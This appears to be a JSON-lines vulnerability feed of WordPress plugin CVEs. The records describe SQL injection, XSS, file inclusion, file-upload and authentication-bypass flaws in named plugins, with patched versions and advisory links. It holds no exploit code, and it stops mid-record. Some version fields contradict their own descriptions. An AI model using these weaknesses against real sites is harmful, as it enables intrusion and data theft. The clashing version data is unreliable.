{"CVE_ID":"CVE-2023-5204","slug":"chatbot","versionImpact":"4.8.9","versionEndExcluding":"4.9.1","description":"The ChatBot plugin for WordPress is vulnerable to SQL Injection via the $strid parameter in versions up to, and including, 4.8.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 4.9.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2977505%40chatbot%2Ftrunk&old=2967435%40chatbot%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2977505%40chatbot%2Ftrunk&old=2967435%40chatbot%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5ad12146-200b-48e5-82de-7572541edcc4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5ad12146-200b-48e5-82de-7572541edcc4?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/chatbot\\\/trunk\\\/qcld-wpwbot-search.php?rev=2957286#L177\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/chatbot\\\/trunk\\\/qcld-wpwbot-search.php?rev=2957286#L177\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5534","slug":"chatbot","versionImpact":"4.9.2","versionEndExcluding":"4.9.1","description":"The AI ChatBot plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 4.8.9. This is due to missing or incorrect nonce validation on the corresponding functions. This makes it possible for unauthenticated attackers to invoke those functions via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to one of the following versions, or a newer patched version: 4.9.1, 4.9.3","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2977505%40chatbot%2Ftrunk&old=2967435%40chatbot%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2977505%40chatbot%2Ftrunk&old=2967435%40chatbot%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/846bd929-45cd-4e91-b232-ae16dd2b12a0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/846bd929-45cd-4e91-b232-ae16dd2b12a0?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5533","slug":"chatbot","versionImpact":"4.9.2","versionEndExcluding":"4.9.1","description":"The AI ChatBot plugin for WordPress is vulnerable to unauthorized use of AJAX actions due to missing capability checks on the corresponding functions in versions up to, and including, 4.8.9. This makes it possible for unauthenticated attackers to perform some of those actions that were intended for higher privileged users.","recommendation":"Update to one of the following versions, or a newer patched version: 4.9.1, 4.9.3","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2977505%40chatbot%2Ftrunk&old=2967435%40chatbot%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2977505%40chatbot%2Ftrunk&old=2967435%40chatbot%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a9db002f-ff41-493a-87b1-5f0b4b07cfc2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a9db002f-ff41-493a-87b1-5f0b4b07cfc2?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3888","slug":"td-composer","versionImpact":"4.8","versionEndExcluding":"4.9","description":"The tagDiv Composer plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's button shortcode in all versions up to, and including, 4.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. NOTE: The vulnerable code in this plugin is specifically tied to the tagDiv Newspaper theme. If another theme is installed (e.g., NewsMag), this code may not be present.","recommendation":"Update to version 4.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/466fc6f3-7b2d-4975-a838-16e27bc9f9b5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/466fc6f3-7b2d-4975-a838-16e27bc9f9b5?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/tagdiv.com\\\/newspaper\\\/\",\"name\":\"https:\\\/\\\/tagdiv.com\\\/newspaper\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3814","slug":"td-composer","versionImpact":"4.8","versionEndExcluding":"4.9","description":"The tagDiv Composer plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'single' module in all versions up to, and including, 4.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 4.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4c2a88c3-5c11-4b42-b8f8-aafecf6c4c74?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4c2a88c3-5c11-4b42-b8f8-aafecf6c4c74?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/tagdiv.com\\\/tagdiv-composer-page-builder-basics\\\/\",\"name\":\"https:\\\/\\\/tagdiv.com\\\/tagdiv-composer-page-builder-basics\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3813","slug":"td-composer","versionImpact":"4.8","versionEndExcluding":"4.9","description":"The tagDiv Composer plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 4.8 via the 'td_block_title' shortcode 'block_template_id' attribute. This makes it possible for authenticated attackers, with contributor-level and above permissions, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where php file type can be uploaded and included.","recommendation":"Update to version 4.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/87b7bc4a-4d2f-4bcb-a9d5-72e31c95c09e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/87b7bc4a-4d2f-4bcb-a9d5-72e31c95c09e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/tagdiv.com\\\/tagdiv-composer-page-builder-basics\\\/\",\"name\":\"https:\\\/\\\/tagdiv.com\\\/tagdiv-composer-page-builder-basics\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6688","slug":"oxygenbuilder","versionImpact":"4.8.3","versionEndExcluding":"4.9","description":"The Oxygen Builder plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the oxy_save_css_from_admin AJAX action in all versions up to, and including, 4.8.3. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update stylesheets.","recommendation":"Update to version 4.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/78c88402-52ca-44ff-8767-1f843fcb66fd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/78c88402-52ca-44ff-8767-1f843fcb66fd?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/oxygenbuilder.com\\\/oxygen-4-9-now-available\\\/\",\"name\":\"https:\\\/\\\/oxygenbuilder.com\\\/oxygen-4-9-now-available\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13322","slug":"ap-plugin-scripteo","versionImpact":"4.88","versionEndExcluding":"4.89","description":"The Ads Pro Plugin - Multi-Purpose WordPress Advertising Manager plugin for WordPress is vulnerable to SQL Injection via the 'a_id' parameter in all versions up to, and including, 4.88 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 4.89, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/ads-pro-plugin-multipurpose-wordpress-advertising-manager\\\/10275010\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/ads-pro-plugin-multipurpose-wordpress-advertising-manager\\\/10275010\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3bcb60a8-220f-45a4-a9a9-10f64acf470c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3bcb60a8-220f-45a4-a9a9-10f64acf470c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0366","slug":"jupiterx-core","versionImpact":"4.8.7","versionEndExcluding":"4.8.8","description":"The Jupiter X Core plugin for WordPress is vulnerable to Local File Inclusion to Remote Code Execution in all versions up to, and including, 4.8.7 via the get_svg() function. This makes it possible for authenticated attackers, with Contributor-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution. In this specific case,  an attacker can create a form that allows SVG uploads, upload an SVG file with malicious content and then include the SVG file in a post to achieve remote code execution. This means it is relatively easy to gain remote code execution as a contributor-level user and above by default.","recommendation":"Update to version 4.8.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3231122\\\/jupiterx-core\\\/trunk\\\/includes\\\/extensions\\\/raven\\\/includes\\\/modules\\\/forms\\\/classes\\\/ajax-handler.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3231122\\\/jupiterx-core\\\/trunk\\\/includes\\\/extensions\\\/raven\\\/includes\\\/modules\\\/forms\\\/classes\\\/ajax-handler.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3231122\\\/jupiterx-core\\\/trunk\\\/includes\\\/extensions\\\/raven\\\/includes\\\/modules\\\/video\\\/widgets\\\/video.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3231122\\\/jupiterx-core\\\/trunk\\\/includes\\\/extensions\\\/raven\\\/includes\\\/modules\\\/video\\\/widgets\\\/video.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1a20dc1d-eb7c-47ac-ad9a-ec4c0d5db62e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1a20dc1d-eb7c-47ac-ad9a-ec4c0d5db62e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0365","slug":"jupiterx-core","versionImpact":"4.8.7","versionEndExcluding":"4.8.8","description":"The Jupiter X Core plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 4.8.7 via the inline SVG feature. This makes it possible for authenticated attackers, with Contributor-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information.","recommendation":"Update to version 4.8.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3231122\\\/jupiterx-core\\\/trunk\\\/includes\\\/extensions\\\/raven\\\/includes\\\/modules\\\/inline-svg\\\/widgets\\\/inline-svg.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3231122\\\/jupiterx-core\\\/trunk\\\/includes\\\/extensions\\\/raven\\\/includes\\\/modules\\\/inline-svg\\\/widgets\\\/inline-svg.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d3bc5ef7-6825-463f-a3ce-d6ab1fc0e030?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d3bc5ef7-6825-463f-a3ce-d6ab1fc0e030?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12316","slug":"jupiterx-core","versionImpact":"4.8.5","versionEndExcluding":"4.8.6","description":"The Jupiter X Core plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the export_popup_action() function in all versions up to, and including, 4.8.5. This makes it possible for unauthenticated attackers to export popup templates.","recommendation":"Update to version 4.8.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/jupiterx-core\\\/trunk\\\/includes\\\/popups\\\/class.php#L475\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/jupiterx-core\\\/trunk\\\/includes\\\/popups\\\/class.php#L475\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3214798\\\/jupiterx-core\\\/trunk\\\/includes\\\/popups\\\/class.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3214798\\\/jupiterx-core\\\/trunk\\\/includes\\\/popups\\\/class.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5db195c1-8917-4465-a5ca-21089afb0bc7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5db195c1-8917-4465-a5ca-21089afb0bc7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12033","slug":"jupiterx-core","versionImpact":"4.8.5","versionEndExcluding":"4.8.6","description":"The Jupiter X Core plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the sync_libraries() function in all versions up to, and including, 4.8.5. This makes it possible for authenticated attackers, with Subscriber-level access and above, to sync libraries","recommendation":"Update to version 4.8.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3214798\\\/jupiterx-core\\\/trunk\\\/includes\\\/extensions\\\/raven\\\/includes\\\/plugin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3214798\\\/jupiterx-core\\\/trunk\\\/includes\\\/extensions\\\/raven\\\/includes\\\/plugin.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7e452aa0-bfb9-4805-b2ed-53464a4b5308?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7e452aa0-bfb9-4805-b2ed-53464a4b5308?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5991","slug":"motopress-hotel-booking-lite","versionEndExcluding":"4.8.5","description":"The Hotel Booking Lite WordPress plugin before 4.8.5 does not validate file paths provided via user input, as well as does not have proper CSRF and authorisation checks, allowing unauthenticated users to download and delete arbitrary files on the server","recommendation":"Update to version 4.8.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e9d35e36-1e60-4483-b8b3-5cbf08fcd49e\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e9d35e36-1e60-4483-b8b3-5cbf08fcd49e\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9849","slug":"real3d-flipbook-lite","versionImpact":"4.8","versionEndExcluding":"4.8.5","description":"The 3D FlipBook, PDF Viewer, PDF Embedder \u2013 Real 3D FlipBook WordPress Plugin plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'r3dfb_save_thumbnail_callback' function in all versions up to, and including, 4.6. This makes it possible for authenticated attackers, with Author-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 4.8.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1f99b366-1a94-41ed-813a-bb13893604d0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1f99b366-1a94-41ed-813a-bb13893604d0?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/real3d-flipbook-lite\\\/tags\\\/4.6\\\/includes\\\/plugin-admin.php#L77\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/real3d-flipbook-lite\\\/tags\\\/4.6\\\/includes\\\/plugin-admin.php#L77\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4662","slug":"oxygenbuilder","versionImpact":"4.8.2","versionEndExcluding":"4.8.3","description":"The Oxygen Builder plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 4.8.2 via post metadata. This is due to the plugin storing custom data in post metadata without an underscore prefix. This makes it possible for lower privileged users, such as contributors, to inject arbitrary PHP code via the WordPress user interface and gain elevated privileges.","recommendation":"Update to version 4.8.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8706c3f6-64e0-440e-a802-5c80d9cc3643?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8706c3f6-64e0-440e-a802-5c80d9cc3643?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/oxygenbuilder.com\\\/oxygen-4-8-3-now-available-security-update\\\/\",\"name\":\"https:\\\/\\\/oxygenbuilder.com\\\/oxygen-4-8-3-now-available-security-update\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2892","slug":"all-in-one-seo-pack","versionImpact":"4.8.1.1","versionEndExcluding":"4.8.2","description":"The All in One SEO \u2013 Powerful SEO Plugin to Boost SEO Rankings & Increase Traffic plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the post Meta Description and Canonical URL parameters in all versions up to, and including, 4.8.1.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 4.8.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3289874\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3289874\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7fd5d31d-a4f3-458a-b457-f20aeaa71749?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7fd5d31d-a4f3-458a-b457-f20aeaa71749?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6938","slug":"oxygenbuilder","versionImpact":"4.8","versionEndExcluding":"4.8.1","description":"The Oxygen Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via a custom field in all versions up to, and including, 4.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. NOTE: Version 4.8.1 of the Oxygen Builder plugin for WordPress addresses this vulnerability by implementing an optional filter to provide output escaping for dynamic data. Please see https:\/\/oxygenbuilder.com\/documentation\/other\/security\/#filtering-dynamic-data for more details.","recommendation":"Update to version 4.8.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ee069cb3-370e-48ea-aa35-c30fe83c2498?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ee069cb3-370e-48ea-aa35-c30fe83c2498?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/oxygenbuilder.com\\\/oxygen-4-8-1-now-available\\\/\",\"name\":\"https:\\\/\\\/oxygenbuilder.com\\\/oxygen-4-8-1-now-available\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13011","slug":"wp-foodbakery","versionImpact":"4.7","versionEndExcluding":"4.8","description":"The WP Foodbakery plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file type validation in the 'upload_publisher_profile_image' function in versions up to, and including, 4.7. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 4.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/food-bakery-restaurant-bakery-responsive-wordpress-theme\\\/18970331\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/food-bakery-restaurant-bakery-responsive-wordpress-theme\\\/18970331\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/850fc4db-6e02-44c7-836a-02c433a0bae7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/850fc4db-6e02-44c7-836a-02c433a0bae7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12848","slug":"skt-builder","versionImpact":"4.7","versionEndExcluding":"4.8","description":"The SKT Page Builder plugin for WordPress is vulnerable to arbitrary file uploads due to a missing capability check on the 'addLibraryByArchive' function in all versions up to, and including, 4.6. This makes it possible for authenticated attackers, with subscriber-level access and above, to upload arbitrary files that make remote code execution possible.","recommendation":"Update to version 4.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/skt-builder\\\/trunk\\\/sktbuilder.php#L960\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/skt-builder\\\/trunk\\\/sktbuilder.php#L960\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3213786%40skt-builder&new=3213786%40skt-builder&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3213786%40skt-builder&new=3213786%40skt-builder&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3218995%40skt-builder&new=3218995%40skt-builder&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3218995%40skt-builder&new=3218995%40skt-builder&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/89e3cef3-c1aa-4df7-a9f9-1ca5837643e1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/89e3cef3-c1aa-4df7-a9f9-1ca5837643e1?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13350","slug":"searchiq","versionImpact":"4.7","versionEndExcluding":"4.8","description":"The SearchIQ \u2013 The Search Solution plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'siq_searchbox' shortcode in all versions up to, and including, 4.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 4.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/searchiq\\\/trunk\\\/library\\\/shortcode.php#L132\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/searchiq\\\/trunk\\\/library\\\/shortcode.php#L132\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/searchiq\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/searchiq\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a04f074c-448d-4c5f-ae46-0ad1a3effdb4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a04f074c-448d-4c5f-ae46-0ad1a3effdb4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0180","slug":"wp-foodbakery","versionImpact":"4.7","versionEndExcluding":"4.8","description":"The WP Foodbakery plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 3.3. This is due to the plugin not properly restricting what user meta can be updated during profile registration. This makes it possible for unauthenticated attackers to register on the site as an administrator.","recommendation":"Update to version 4.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/food-bakery-restaurant-bakery-responsive-wordpress-theme\\\/18970331\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/food-bakery-restaurant-bakery-responsive-wordpress-theme\\\/18970331\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d7140a6e-a528-428e-850e-5e4a481c5d7d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d7140a6e-a528-428e-850e-5e4a481c5d7d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4254","slug":"chatbot","versionEndExcluding":"4.7.8","description":"The AI ChatBot WordPress plugin before 4.7.8 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0dfffe48-e60d-4bab-b194-8a63554246c3\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0dfffe48-e60d-4bab-b194-8a63554246c3\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4253","slug":"chatbot","versionEndExcluding":"4.7.8","description":"The AI ChatBot WordPress plugin before 4.7.8 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1cbbab9e-be3d-4081-bc0e-c52d500d9871\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1cbbab9e-be3d-4081-bc0e-c52d500d9871\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7781","slug":"jupiterx-core","versionImpact":"4.7.5","versionEndExcluding":"4.7.8","description":"The Jupiter X Core plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 4.7.5. This is due to improper authentication via the Social Login widget. This makes it possible for unauthenticated attackers to log in as the first user to have logged in with a social media account, including administrator accounts. Attackers can exploit the vulnerability even if the Social Login element has been disabled, as long as it was previously enabled and used. The vulnerability was partially patched in version 4.7.5, and fully patched in version 4.7.8.","recommendation":"Update to version 4.7.8, or a newer patched 